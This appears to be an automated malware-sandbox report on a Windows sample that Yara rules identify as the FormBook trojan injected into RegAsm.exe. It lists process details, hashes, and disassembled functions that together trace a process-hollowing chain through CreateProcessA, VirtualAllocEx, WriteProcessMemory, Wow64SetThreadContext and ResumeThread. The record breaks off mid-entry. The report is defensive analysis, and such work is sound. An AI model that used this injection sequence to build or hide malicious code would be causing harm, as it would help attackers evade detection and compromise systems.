              MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
              Has elevated privileges:false
              Has administrator privileges:false
              Programmed in:C, C++ or other language
              Reputation:high
              Has exited:true

              General

              Target ID:8
              Start time:05:34:11
              Start date:04/10/2024
              Path:C:\Users\user\AppData\Local\Temp\temp_executable.exe
              Wow64 process (32bit):true
              Commandline:"C:\Users\user~1\AppData\Local\Temp\temp_executable.exe"
              Imagebase:0x8d0000
              File size:55'296 bytes
              MD5 hash:1774855B0E8A12C20A7A321D995FA17A
              Has elevated privileges:false
              Has administrator privileges:false
              Programmed in:C, C++ or other language
              Antivirus matches:
              • Detection: 100%, Avira
              • Detection: 100%, Joe Sandbox ML
              Reputation:low
              Has exited:true

              General

              Target ID:9
              Start time:05:34:13
              Start date:04/10/2024
              Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
              Wow64 process (32bit):false
              Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
              Imagebase:0x430000
              File size:65'440 bytes
              MD5 hash:0D5DF43AF2916F47D00C1573797C1A13
              Has elevated privileges:false
              Has administrator privileges:false
              Programmed in:C, C++ or other language
              Reputation:high
              Has exited:true

              General

              Target ID:10
              Start time:05:34:13
              Start date:04/10/2024
              Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
              Wow64 process (32bit):true
              Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
              Imagebase:0xb10000
              File size:65'440 bytes
              MD5 hash:0D5DF43AF2916F47D00C1573797C1A13
              Has elevated privileges:false
              Has administrator privileges:false
              Programmed in:C, C++ or other language
              Yara matches:
              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000A.00000002.1842189072.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000A.00000002.1842189072.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000A.00000002.1842383529.0000000000FA0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000A.00000002.1842383529.0000000000FA0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
              Reputation:high
              Has exited:true

              Disassembly

              Reset < >

                Execution Graph

                Execution Coverage:25.6%
                Dynamic/Decrypted Code Coverage:100%
                Signature Coverage:34%
                Total number of Nodes:100
                Total number of Limit Nodes:0
                execution_graph 3098 13c41ac 3099 13c4244 CreateProcessA 3098->3099 3101 13c4402 3099->3101 3106 13c48dc 3107 13c4921 ResumeThread 3106->3107 3108 13c494e 3107->3108 3092 13c154f 3093 13c155f 3092->3093 3094 13c160a 3093->3094 3095 13c3fbd 7 API calls 3093->3095 3096 13c3558 7 API calls 3093->3096 3097 13c354a 7 API calls 3093->3097 3095->3094 3096->3094 3097->3094 3102 13c45a8 3103 13c45f8 Wow64SetThreadContext 3102->3103 3105 13c4636 3103->3105 3112 13c47f8 3114 13c484b WriteProcessMemory 3112->3114 3115 13c489c 3114->3115 2998 13c1560 2999 13c1584 2998->2999 3000 13c160a 2999->3000 3004 13c3fbd 2999->3004 3024 13c354a 2999->3024 3044 13c3558 2999->3044 3005 13c3638 3004->3005 3023 13c3f55 3005->3023 3064 13c2d14 3005->3064 3007 13c377f 3008 13c2d20 Wow64SetThreadContext 3007->3008 3010 13c388b 3007->3010 3008->3010 3009 13c2d38 ReadProcessMemory 3012 13c396e 3009->3012 3010->3009 3011 13c2d50 VirtualAllocEx 3014 13c3ac7 3011->3014 3012->3011 3013 13c2d5c WriteProcessMemory 3021 13c3b58 3013->3021 3014->3013 3015 13c3d82 3016 13c2d5c WriteProcessMemory 3015->3016 3017 13c3dc8 3016->3017 3019 13c2d68 Wow64SetThreadContext 3017->3019 3022 13c3ea7 3017->3022 3018 13c2d5c WriteProcessMemory 3018->3021 3019->3022 3020 13c2d80 ResumeThread 3020->3023 3021->3015 3021->3018 3022->3020 3023->3000 3025 13c3588 3024->3025 3026 13c2d14 CreateProcessA 3025->3026 3042 13c3f55 3025->3042 3027 13c377f 3026->3027 3030 13c388b 3027->3030 3068 13c2d20 3027->3068 3072 13c2d38 3030->3072 3032 13c396e 3076 13c2d50 3032->3076 3035 13c3d82 3036 13c2d5c WriteProcessMemory 3035->3036 3038 13c3dc8 3036->3038 3037 13c3b58 3037->3035 3039 13c2d5c WriteProcessMemory 3037->3039 3043 13c3ea7 3038->3043 3084 13c2d68 3038->3084 3039->3037 3042->3000 3088 13c2d80 3043->3088 3045 13c3588 3044->3045 3046 13c2d14 CreateProcessA 3045->3046 3063 13c3f55 3045->3063 3047 13c377f 3046->3047 3048 13c2d20 Wow64SetThreadContext 3047->3048 3050 13c388b 3047->3050 3048->3050 3049 13c2d38 ReadProcessMemory 3051 13c396e 3049->3051 3050->3049 3052 13c2d50 VirtualAllocEx 3051->3052 3053 13c3ac7 3052->3053 3054 13c2d5c WriteProcessMemory 3053->3054 3061 13c3b58 3054->3061 3055 13c3d82 3056 13c2d5c WriteProcessMemory 3055->3056 3057 13c3dc8 3056->3057 3059 13c2d68 Wow64SetThreadContext 3057->3059 3062 13c3ea7 3057->3062 3058 13c2d5c WriteProcessMemory 3058->3061 3059->3062 3060 13c2d80 ResumeThread 3060->3063 3061->3055 3061->3058 3062->3060 3063->3000 3065 13c41b8 CreateProcessA 3064->3065 3067 13c4402 3065->3067 3069 13c45b0 Wow64SetThreadContext 3068->3069 3071 13c4636 3069->3071 3071->3030 3073 13c4678 ReadProcessMemory 3072->3073 3075 13c4706 3073->3075 3075->3032 3077 13c4748 VirtualAllocEx 3076->3077 3079 13c3ac7 3077->3079 3080 13c2d5c 3079->3080 3081 13c4800 WriteProcessMemory 3080->3081 3083 13c489c 3081->3083 3083->3037 3085 13c45b0 Wow64SetThreadContext 3084->3085 3087 13c4636 3085->3087 3087->3043 3089 13c48e0 ResumeThread 3088->3089 3091 13c494e 3089->3091 3091->3042 3109 13c4740 3110 13c478b VirtualAllocEx 3109->3110 3111 13c47c2 3110->3111 3116 13c4670 3117 13c46c3 ReadProcessMemory 3116->3117 3118 13c4706 3117->3118

                Executed Functions

                Function 013C3558 Relevance: 1.9, Strings: 1, Instructions: 615COMMON
                Download Yara Rule

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 36 13c3558-13c3586 37 13c358d-13c360b 36->37 38 13c3588 36->38 39 13c3626-13c362a 37->39 38->37 40 13c362c-13c400b 39->40 41 13c360d-13c361f 39->41 44 13c3638-13c3799 call 13c2d14 40->44 45 13c4011-13c4018 40->45 41->39 42 13c3621 41->42 42->39 57 13c37dd-13c3843 44->57 58 13c379b-13c37d2 44->58 65 13c384a-13c3870 57->65 66 13c3845 57->66 58->57 68 13c3925-13c392f 65->68 69 13c3876-13c3886 call 13c2d20 65->69 66->65 71 13c3936-13c398e call 13c2d38 68->71 72 13c3931 68->72 73 13c388b-13c3898 69->73 80 13c3990-13c39c7 71->80 81 13c39d2-13c39eb 71->81 72->71 75 13c38ca-13c38cc 73->75 76 13c389a-13c38c8 call 13c2d2c 73->76 79 13c38d2-13c38e0 75->79 76->79 83 13c3924 79->83 84 13c38e2-13c3919 79->84 80->81 85 13c39ed-13c3a1f call 13c2d44 81->85 86 13c3a64-13c3aed call 13c2d50 81->86 83->68 84->83 92 13c3a21-13c3a58 85->92 93 13c3a63 85->93 102 13c3aef-13c3b26 86->102 103 13c3b31-13c3b78 call 13c2d5c 86->103 92->93 93->86 102->103 109 13c3bbc-13c3bee 103->109 110 13c3b7a-13c3bb1 103->110 115 13c3d60-13c3d7c 109->115 110->109 117 13c3d82-13c3de8 call 13c2d5c 115->117 118 13c3bf3-13c3c71 115->118 125 13c3e2c-13c3e5a 117->125 126 13c3dea-13c3e21 117->126 130 13c3d55-13c3d5a 118->130 131 13c3c77-13c3ceb call 13c2d5c 118->131 132 13c3e5c 125->132 133 13c3e61-13c3e8c 125->133 126->125 130->115 144 13c3cf0-13c3d10 131->144 132->133 138 13c3f47-13c3f50 call 13c2d80 133->138 139 13c3e92-13c3ea2 call 13c2d68 133->139 146 13c3f55-13c3f75 138->146 145 13c3ea7-13c3eb4 139->145 147 13c3d54 144->147 148 13c3d12-13c3d49 144->148 149 13c3ee6-13c3ee8 145->149 150 13c3eb6-13c3ee4 call 13c2d74 145->150 151 13c3fb9-13c3fef 146->151 152 13c3f77-13c3fae 146->152 147->130 148->147 155 13c3eee-13c3f02 149->155 150->155 151->45 152->151 159 13c3f04-13c3f3b 155->159 160 13c3f46 155->160 159->160 160->138
                Strings
                Memory Dump Source
                • Source File: 00000008.00000002.1315375351.00000000013C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013C0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_8_2_13c0000_temp_executable.jbxd
                Similarity
                • API ID: MemoryProcessWrite
                • String ID: (
                • API String ID: 3559483778-3887548279
                • Opcode ID: 8ed8b2e79f13621e80f7f9f13ca93195ab8cfb0f4379a8aad37de464c624f4d1
                • Instruction ID: 6c14dc6f92dd3e6bd96af6e26a9ce67b9499996531103d2681c904affbec189f
                • Opcode Fuzzy Hash: 8ed8b2e79f13621e80f7f9f13ca93195ab8cfb0f4379a8aad37de464c624f4d1
                • Instruction Fuzzy Hash: D952DF74E012298FEB68DF69C984BDDBBB2BF89304F1081E9D509A7254DB349E85CF50
                Function 013C1930 Relevance: .3, Instructions: 287COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000008.00000002.1315375351.00000000013C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013C0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_8_2_13c0000_temp_executable.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 3ddcc2bbe08017240229701891a90b3055f7b3879328dd00bbf2b69827424224
                • Instruction ID: 73a1367e0bbe9c54f63b8d57e6b2734890a451a633cdf1a76a1073b4a9d6cd11
                • Opcode Fuzzy Hash: 3ddcc2bbe08017240229701891a90b3055f7b3879328dd00bbf2b69827424224
                • Instruction Fuzzy Hash: 7FD1C074E01219CFDB14CFA9C484ADDBBF5BF89714F148269E405AB366DB30A986CF90
                Function 013C2D14 Relevance: 1.7, APIs: 1, Instructions: 243processCOMMON
                Download Yara Rule

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 168 13c2d14-13c4250 171 13c4289-13c42a9 168->171 172 13c4252-13c425c 168->172 179 13c42ab-13c42b5 171->179 180 13c42e2-13c4311 171->180 172->171 173 13c425e-13c4260 172->173 174 13c4262-13c426c 173->174 175 13c4283-13c4286 173->175 177 13c426e 174->177 178 13c4270-13c427f 174->178 175->171 177->178 178->178 181 13c4281 178->181 179->180 182 13c42b7-13c42b9 179->182 188 13c434a-13c4400 CreateProcessA 180->188 189 13c4313-13c431d 180->189 181->175 183 13c42dc-13c42df 182->183 184 13c42bb-13c42c5 182->184 183->180 186 13c42c9-13c42d8 184->186 187 13c42c7 184->187 186->186 190 13c42da 186->190 187->186 199 13c4409-13c4484 188->199 200 13c4402-13c4408 188->200 189->188 191 13c431f-13c4321 189->191 190->183 193 13c4344-13c4347 191->193 194 13c4323-13c432d 191->194 193->188 195 13c432f 194->195 196 13c4331-13c4340 194->196 195->196 196->196 198 13c4342 196->198 198->193 209 13c4494-13c4498 199->209 210 13c4486-13c448a 199->210 200->199 212 13c44a8-13c44ac 209->212 213 13c449a-13c449e 209->213 210->209 211 13c448c-13c448f call 13c0fc8 210->211 211->209 216 13c44bc-13c44c0 212->216 217 13c44ae-13c44b2 212->217 213->212 215 13c44a0-13c44a3 call 13c0fc8 213->215 215->212 218 13c44d2-13c44d9 216->218 219 13c44c2-13c44c8 216->219 217->216 221 13c44b4-13c44b7 call 13c0fc8 217->221 222 13c44db-13c44ea 218->222 223 13c44f0 218->223 219->218 221->216 222->223 226 13c44f1 223->226 226->226
                APIs
                • CreateProcessA.KERNEL32(?,?,00000005,?,?,?,?,?,?,?), ref: 013C43ED
                Memory Dump Source
                • Source File: 00000008.00000002.1315375351.00000000013C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013C0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_8_2_13c0000_temp_executable.jbxd
                Similarity
                • API ID: CreateProcess
                • String ID:
                • API String ID: 963392458-0
                • Opcode ID: 95ccf5eaa66e52567114bd20331e2413e07ec723d1f80057a1409c1a96e6c548
                • Instruction ID: 655e6c83aaa5e5757f759939b8149b94c84f50dd0e71ab584c07d80f3caf4a7f
                • Opcode Fuzzy Hash: 95ccf5eaa66e52567114bd20331e2413e07ec723d1f80057a1409c1a96e6c548
                • Instruction Fuzzy Hash: 2A915A71D00719DFEB24CFA9C8517EDBBB2AF48714F14816AE809A7280DB749D86CF91
                Function 013C41AC Relevance: 1.7, APIs: 1, Instructions: 243processCOMMON
                Download Yara Rule

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 227 13c41ac-13c4250 229 13c4289-13c42a9 227->229 230 13c4252-13c425c 227->230 237 13c42ab-13c42b5 229->237 238 13c42e2-13c4311 229->238 230->229 231 13c425e-13c4260 230->231 232 13c4262-13c426c 231->232 233 13c4283-13c4286 231->233 235 13c426e 232->235 236 13c4270-13c427f 232->236 233->229 235->236 236->236 239 13c4281 236->239 237->238 240 13c42b7-13c42b9 237->240 246 13c434a-13c4400 CreateProcessA 238->246 247 13c4313-13c431d 238->247 239->233 241 13c42dc-13c42df 240->241 242 13c42bb-13c42c5 240->242 241->238 244 13c42c9-13c42d8 242->244 245 13c42c7 242->245 244->244 248 13c42da 244->248 245->244 257 13c4409-13c4484 246->257 258 13c4402-13c4408 246->258 247->246 249 13c431f-13c4321 247->249 248->241 251 13c4344-13c4347 249->251 252 13c4323-13c432d 249->252 251->246 253 13c432f 252->253 254 13c4331-13c4340 252->254 253->254 254->254 256 13c4342 254->256 256->251 267 13c4494-13c4498 257->267 268 13c4486-13c448a 257->268 258->257 270 13c44a8-13c44ac 267->270 271 13c449a-13c449e 267->271 268->267 269 13c448c-13c448f call 13c0fc8 268->269 269->267 274 13c44bc-13c44c0 270->274 275 13c44ae-13c44b2 270->275 271->270 273 13c44a0-13c44a3 call 13c0fc8 271->273 273->270 276 13c44d2-13c44d9 274->276 277 13c44c2-13c44c8 274->277 275->274 279 13c44b4-13c44b7 call 13c0fc8 275->279 280 13c44db-13c44ea 276->280 281 13c44f0 276->281 277->276 279->274 280->281 284 13c44f1 281->284 284->284
                APIs
                • CreateProcessA.KERNEL32(?,?,00000005,?,?,?,?,?,?,?), ref: 013C43ED
                Memory Dump Source
                • Source File: 00000008.00000002.1315375351.00000000013C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013C0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_8_2_13c0000_temp_executable.jbxd
                Similarity
                • API ID: CreateProcess
                • String ID:
                • API String ID: 963392458-0
                • Opcode ID: 6f099aa43e93643d89b6316b008badac7e1349deabaef5a927ba892bc17045bc
                • Instruction ID: 69dfcdbbb4466c61bd28eed54d0989a40d38d6cf0625eab7dd65672575c5fbd3
                • Opcode Fuzzy Hash: 6f099aa43e93643d89b6316b008badac7e1349deabaef5a927ba892bc17045bc
                • Instruction Fuzzy Hash: 92914971D007198FEB24CFA8C851BDDBBB2AF48714F14856AE809A7280DB749986CF91
                Function 013C2D5C Relevance: 1.6, APIs: 1, Instructions: 70injectionCOMMON
                Download Yara Rule

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 285 13c2d5c-13c4851 288 13c4861-13c489a WriteProcessMemory 285->288 289 13c4853-13c485f 285->289 290 13c489c-13c48a2 288->290 291 13c48a3-13c48cb 288->291 289->288 290->291
                APIs
                • WriteProcessMemory.KERNEL32(?,00000000,00000000,?,00010002), ref: 013C488D
                Memory Dump Source
                • Source File: 00000008.00000002.1315375351.00000000013C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013C0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_8_2_13c0000_temp_executable.jbxd
                Similarity
                • API ID: MemoryProcessWrite
                • String ID:
                • API String ID: 3559483778-0
                • Opcode ID: db58e8cc6a2df390da39c6228723b5caad7536e7ab6040fe2e8b7f53d8d41ec3
                • Instruction ID: 06c382844598447cddeee5f91473120e8d5b407f7b136275a9564dc7c0b1b879
                • Opcode Fuzzy Hash: db58e8cc6a2df390da39c6228723b5caad7536e7ab6040fe2e8b7f53d8d41ec3
                • Instruction Fuzzy Hash: 5B2110B59003499FDB14CF9AC885BDEBBF5FB48310F10842EE918A7340D779A944CBA4
                Function 013C47F8 Relevance: 1.6, APIs: 1, Instructions: 69injectionCOMMON
                Download Yara Rule

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 294 13c47f8-13c4851 296 13c4861-13c489a WriteProcessMemory 294->296 297 13c4853-13c485f 294->297 298 13c489c-13c48a2 296->298 299 13c48a3-13c48cb 296->299 297->296 298->299
                APIs
                • WriteProcessMemory.KERNEL32(?,00000000,00000000,?,00010002), ref: 013C488D
                Memory Dump Source
                • Source File: 00000008.00000002.1315375351.00000000013C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013C0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_8_2_13c0000_temp_executable.jbxd
                Similarity
                • API ID: MemoryProcessWrite
                • String ID:
                • API String ID: 3559483778-0
                • Opcode ID: 2043ac9fab38ec7fa8a15547f0dfab38a752f58a74ebd119dc154ba4558db148
                • Instruction ID: 5009e3992493f0f8b637182e5bcf767c1614fcae0454eb0756878512ae99d3f5
                • Opcode Fuzzy Hash: 2043ac9fab38ec7fa8a15547f0dfab38a752f58a74ebd119dc154ba4558db148
                • Instruction Fuzzy Hash: FB2133B59003499FCB10CFAAC885BDEBBF1FB48310F10842EE918A7340D3399945CBA0
                Function 013C2D38 Relevance: 1.6, APIs: 1, Instructions: 64COMMON
                Download Yara Rule

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 302 13c2d38-13c4704 ReadProcessMemory 305 13c470d-13c4735 302->305 306 13c4706-13c470c 302->306 306->305
                APIs
                • ReadProcessMemory.KERNEL32(?,?,?,?,00010002), ref: 013C46F7
                Memory Dump Source
                • Source File: 00000008.00000002.1315375351.00000000013C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013C0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_8_2_13c0000_temp_executable.jbxd
                Similarity
                • API ID: MemoryProcessRead
                • String ID:
                • API String ID: 1726664587-0
                • Opcode ID: 79fd410d925ef2a9bda90e56049631eb0a4cffb75562c49188b5fcbd7221e9ae
                • Instruction ID: 9d45ac32251d067b90abb2edd86512cef3819e57c5016869ede6c0a159be4db6
                • Opcode Fuzzy Hash: 79fd410d925ef2a9bda90e56049631eb0a4cffb75562c49188b5fcbd7221e9ae
                • Instruction Fuzzy Hash: 0B2100B5900349DFCB10CF9AD884BDEBBF5FB48320F10842AE918A7340D738A944CBA4
                Function 013C2D20 Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON
                Download Yara Rule

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 309 13c2d20-13c45fc 312 13c45fe-13c4606 309->312 313 13c4608-13c4634 Wow64SetThreadContext 309->313 312->313 314 13c463d-13c4665 313->314 315 13c4636-13c463c 313->315 315->314
                APIs
                • Wow64SetThreadContext.KERNEL32(02BD87E8,00000000), ref: 013C4627
                Memory Dump Source
                • Source File: 00000008.00000002.1315375351.00000000013C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013C0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_8_2_13c0000_temp_executable.jbxd
                Similarity
                • API ID: ContextThreadWow64
                • String ID:
                • API String ID: 983334009-0
                • Opcode ID: 8946a5966cce7cf2a52bcc723a23e6eab1114316829a77ea4ebfe72342f9168b
                • Instruction ID: 5d5554d207c0540ef118b18115e523fc2ebc406ab257fbc1026d1782c1bc734d
                • Opcode Fuzzy Hash: 8946a5966cce7cf2a52bcc723a23e6eab1114316829a77ea4ebfe72342f9168b
                • Instruction Fuzzy Hash: F2215871D102599FDB10CF9AC445BAEFBF4FB48624F10812AE918B7340D778A904CFA5
                Function 013C2D68 Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON
                Download Yara Rule

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 318 13c2d68-13c45fc 321 13c45fe-13c4606 318->321 322 13c4608-13c4634 Wow64SetThreadContext 318->322 321->322 323 13c463d-13c4665 322->323 324 13c4636-13c463c 322->324 324->323
                APIs
                • Wow64SetThreadContext.KERNEL32(02BD87E8,00000000), ref: 013C4627
                Memory Dump Source
                • Source File: 00000008.00000002.1315375351.00000000013C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013C0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_8_2_13c0000_temp_executable.jbxd
                Similarity
                • API ID: ContextThreadWow64
                • String ID:
                • API String ID: 983334009-0
                • Opcode ID: 0f36b8698fa0af6bee7827f5c1206702f8fe82724a678044c977455c852c7de2
                • Instruction ID: 3379fd76b30fa6542df609cb99dbfa00646f62a9aeb1a6debe9c57cdf69f0c9f
                • Opcode Fuzzy Hash: 0f36b8698fa0af6bee7827f5c1206702f8fe82724a678044c977455c852c7de2
                • Instruction Fuzzy Hash: D4215871D002199FDB10CF9AC445BAEFBF4FB08624F10812AE918B7340D778A9048FA5
                Function 013C4670 Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                Download Yara Rule

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 327 13c4670-13c4704 ReadProcessMemory 329 13c470d-13c4735 327->329 330 13c4706-13c470c 327->330 330->329
                APIs
                • ReadProcessMemory.KERNEL32(?,?,?,?,00010002), ref: 013C46F7
                Memory Dump Source
                • Source File: 00000008.00000002.1315375351.00000000013C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013C0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_8_2_13c0000_temp_executable.jbxd
                Similarity
                • API ID: MemoryProcessRead
                • String ID:
                • API String ID: 1726664587-0
                • Opcode ID: d9ca099ce66ea4913f798e69c7f21515c938e14f4435067c20037ade2b4bd8e2
                • Instruction ID: c66db9dd4c1a68ea981314b609256f8e0d2c4abd5ce3c6195ee2c1ab268005df
                • Opcode Fuzzy Hash: d9ca099ce66ea4913f798e69c7f21515c938e14f4435067c20037ade2b4bd8e2
                • Instruction Fuzzy Hash: 612100B5800349DFCB10CF9AD984ADEBBF1BB48320F10842AE958A7250D338A955CFA0
                Function 013C45A8 Relevance: 1.6, APIs: 1, Instructions: 61threadCOMMON
                Download Yara Rule

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 333 13c45a8-13c45fc 335 13c45fe-13c4606 333->335 336 13c4608-13c4634 Wow64SetThreadContext 333->336 335->336 337 13c463d-13c4665 336->337 338 13c4636-13c463c 336->338 338->337
                APIs
                • Wow64SetThreadContext.KERNEL32(02BD87E8,00000000), ref: 013C4627
                Memory Dump Source
                • Source File: 00000008.00000002.1315375351.00000000013C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013C0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_8_2_13c0000_temp_executable.jbxd
                Similarity
                • API ID: ContextThreadWow64
                • String ID:
                • API String ID: 983334009-0
                • Opcode ID: 2b8e53b9030369131c506ac14e8be4aa35f73ad4e380c6bfdad642bc888402e4
                • Instruction ID: f8688cbfecfd769d776794a3e46514909077f0ac927ae8164143b3756bce4b7b
                • Opcode Fuzzy Hash: 2b8e53b9030369131c506ac14e8be4aa35f73ad4e380c6bfdad642bc888402e4
                • Instruction Fuzzy Hash: B9215875D1025A9FDB10CFAAC585BAEFBF4FB48624F54812AD418B7340D378A9058FA1
                Function 013C2D50 Relevance: 1.6, APIs: 1, Instructions: 54memoryCOMMON
                Download Yara Rule

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 341 13c2d50-13c47c0 VirtualAllocEx 344 13c47c9-13c47e6 341->344 345 13c47c2-13c47c8 341->345 345->344
                APIs
                • VirtualAllocEx.KERNEL32(?,?,?,?,00010002), ref: 013C47B3
                Memory Dump Source
                • Source File: 00000008.00000002.1315375351.00000000013C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013C0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_8_2_13c0000_temp_executable.jbxd
                Similarity
                • API ID: AllocVirtual
                • String ID:
                • API String ID: 4275171209-0
                • Opcode ID: b67480533c03edf282fb380d7d3bc1c664c0cbb818acb1c05127b6908fa93db8
                • Instruction ID: d4472368df7e73449c7c90a0bcb4df4d0c27dfd3152472b68fd367a4926d7a3a
                • Opcode Fuzzy Hash: b67480533c03edf282fb380d7d3bc1c664c0cbb818acb1c05127b6908fa93db8
                • Instruction Fuzzy Hash: 731134B590034D9FDB20DF9AC884BDEBBF5EB48324F108419EA29A7350D775A940CFA1
                Function 013C4740 Relevance: 1.6, APIs: 1, Instructions: 52memoryCOMMON
                Download Yara Rule

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 348 13c4740-13c4783 349 13c478b-13c47c0 VirtualAllocEx 348->349 350 13c47c9-13c47e6 349->350 351 13c47c2-13c47c8 349->351 351->350
                APIs
                • VirtualAllocEx.KERNEL32(?,?,?,?,00010002), ref: 013C47B3
                Memory Dump Source
                • Source File: 00000008.00000002.1315375351.00000000013C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013C0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_8_2_13c0000_temp_executable.jbxd
                Similarity
                • API ID: AllocVirtual
                • String ID:
                • API String ID: 4275171209-0
                • Opcode ID: 90c509e9cc808425bfc4e04fccf442c8d386882c57a50e4ff01bafe979ca673f
                • Instruction ID: 97251836e319bce4dce8f2d84644d200b51a374ea17a197cbeb2a3ab8003ba61
                • Opcode Fuzzy Hash: 90c509e9cc808425bfc4e04fccf442c8d386882c57a50e4ff01bafe979ca673f
                • Instruction Fuzzy Hash: 731137B59003499FDB20CF9AC884BDEBBF5EB48310F108419E918A7350D735A945CFA1
                Function 013C2D80 Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON
                Download Yara Rule

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 354 13c2d80-13c494c ResumeThread 357 13c494e-13c4954 354->357 358 13c4955-13c4972 354->358 357->358
                APIs
                • ResumeThread.KERNEL32(02BD87E8), ref: 013C493F
                Memory Dump Source
                • Source File: 00000008.00000002.1315375351.00000000013C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013C0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_8_2_13c0000_temp_executable.jbxd
                Similarity
                • API ID: ResumeThread
                • String ID:
                • API String ID: 947044025-0
                • Opcode ID: 4fd615f673fbf7200f14aa651a0988ff34d1879acc5bcd2f67898e029eab02a2
                • Instruction ID: 9ee9b14ccd0512bae394d42e18c4b1e86c3d40461819273946cfee786d610e34
                • Opcode Fuzzy Hash: 4fd615f673fbf7200f14aa651a0988ff34d1879acc5bcd2f67898e029eab02a2
                • Instruction Fuzzy Hash: B61143B58003498FDB20DF9AC445B9EBBF8EB48324F208419D518A3340D774A800CFA5
                Function 013C48DC Relevance: 1.5, APIs: 1, Instructions: 46threadCOMMON
                Download Yara Rule

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 361 13c48dc-13c494c ResumeThread 363 13c494e-13c4954 361->363 364 13c4955-13c4972 361->364 363->364
                APIs
                • ResumeThread.KERNEL32(02BD87E8), ref: 013C493F
                Memory Dump Source
                • Source File: 00000008.00000002.1315375351.00000000013C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013C0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_8_2_13c0000_temp_executable.jbxd
                Similarity
                • API ID: ResumeThread
                • String ID:
                • API String ID: 947044025-0
                • Opcode ID: ad31ca10936bd51dd1db4aba44b5359e920de901281fe6a5326cbc923a2c0fce
                • Instruction ID: 29b85437f67b783a751cc8580e9615730617166178ebb5bd3d9164f525f87c85
                • Opcode Fuzzy Hash: ad31ca10936bd51dd1db4aba44b5359e920de901281fe6a5326cbc923a2c0fce
                • Instruction Fuzzy Hash: 7E1122B5D003498FDB20DF9AD444BDEFBF4AB48324F24841AD519A3350C778A945CFA1
                Function 011CD76D Relevance: .0, Instructions: 45COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000008.00000002.1315050100.00000000011CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 011CD000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_8_2_11cd000_temp_executable.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: e008d6fdf11e6b2824f2ead724bcff29d6229b4b9f694bce15cdf85ee0d11cbe
                • Instruction ID: dce117f92d62a8450e0f4f5196c63968dfb75e349769c9b60676a079b24a5f7f
                • Opcode Fuzzy Hash: e008d6fdf11e6b2824f2ead724bcff29d6229b4b9f694bce15cdf85ee0d11cbe
                • Instruction Fuzzy Hash: 9601F731108784AEEB284A55ED84B66FFD8DF51A29F04C07DED090A582C3789844CAF2
                Function 011CD76C Relevance: .0, Instructions: 36COMMON
                Download Yara Rule
                Memory Dump Source
